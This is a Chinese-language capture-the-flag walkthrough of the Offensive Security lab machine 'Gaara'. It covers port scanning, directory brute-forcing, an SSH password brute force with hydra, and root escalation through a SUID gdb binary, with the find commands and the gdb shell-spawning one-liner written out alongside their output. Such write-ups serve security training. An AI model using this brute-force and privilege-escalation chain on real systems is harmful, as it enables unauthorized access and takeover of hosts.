Offensive Security-1.Gaara-SSH爆破，利用SUID提权

Offensive Security | Control Panel (offensive-security.com)（需注册登录）

题目名为Gaara

主机ip:192.168.52.142

首先切换为root用户,密码为kali

nmap扫描

22端口和80端口开着

22为ssh端口,用于SSH远程链接,攻击方向为爆破,SSH隧道及内网转发文件存储

80为web服务端口,一般进行Web攻击,爆破,对应服务器版本漏洞

web 敏感目录扫描

使用 curl命令看能否访问ip地址

Linux curl命令详解

curl是一个利用URL规则在命令行下工作的文件传输工具，可以说是一款很强大的http命令行工具。它支持文件的上传和下载，是综合传输工具，但按传统，习惯称url为下载工具
语法：# curl [option] [url]

执行curl 192.168.52.142

执行后，192.168.52.142 的html就会显示在屏幕上了

浏览器中也可以看到，是动漫人物Gaara的图片

使用dirbuster扫描敏感目录

当然也可以用在线网站Webscan或者其他软件扫描

看看有没有敏感目录文件

（自带的字典在/usr/share/dirbuster/wordlists下）

很遗憾没有扫出来

SSH利用

SSH暴力破解

网站没有敏感目录，接下来只有ssh端口可以利用,从web网站得到的唯一信息就是gaara这个名字，猜测此名称为SSH登录时的用户名

接下来尝试使用字典进行爆破

使用kali里的hydra，加上kali自带的字典比如/usr/share/wordlists/metasploit/unix_passwords.txt

Hydra（爆破神器）使用方法

输入如下命令

-l 表示单用户

-P表示多密码，需要填写路径

-f成功一个就停止

跑出密码了

现在可以登录ssh了

root@kali:/home/kali# ssh gaara@192.168.52.142
gaara@192.168.52.142's password: 
···
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)

suid提权

SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。

如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说，命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

输入命令后可以看到以下文件具有SUID权限

在GTFOBins可以查看哪些能提权，哪些能维持权限

经过搜索发现gdb可以提权

执行/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit看看

成功获取root权限

gaara@Gaara:~$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
···

For help, type "help".
Type "apropos word" to search for commands related to "word".
# whoami
root

最后获取flag